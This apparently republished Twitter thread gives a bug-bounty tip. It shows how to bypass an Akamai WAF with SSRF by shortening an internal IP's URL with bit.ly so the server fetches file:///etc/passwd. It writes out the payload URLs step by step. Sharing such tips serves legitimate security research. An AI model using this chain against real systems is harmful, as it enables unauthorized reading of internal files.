Basavaraj Banakar🇮🇳 Profile picture
n00b | ಕನ್ನಡಿಗ❤️ | @basubanakar@infosec.exchange

Sep 23, 2022, 7 tweets

Akamai WAF Bypass read internal files via SSRF

1. target[.]com/download?url=file:///etc/passwd (Blocked by akamai waf)

#bugbountytips #bugbounty #ssrf #wafbypass #hacking

2. target[.]com disclosing internal ip in the response header ex: X-Server: 10.136.166.91

3. Now target[.]com/download?url=http://10.136.166.91 (weird 403)

4. Used URL Shortener bitly and shortened http://10.136.166.91 (Example: bit[.]ly/blahblah)

5. Now target[.]com/download?url=bit[.]ly/blahblah I got successful response i.e with html content which is same as target[.]com

6. Now used http://10.136.166.91/download?url=file:///etc/passwd and shortened it ex: bit[.]ly/2ndblah (Because here frontend and backend both have same source code)

7. Here comes hackermode on😈
target[.]com/download?url=http://bit[.]ly/2ndblah and successfully got etc/passwd content

Share this Scrolly Tale with your friends.

A Scrolly Tale is a new way to read Twitter threads with a more visually immersive experience.
Discover more beautiful Scrolly Tales like this.

Keep scrolling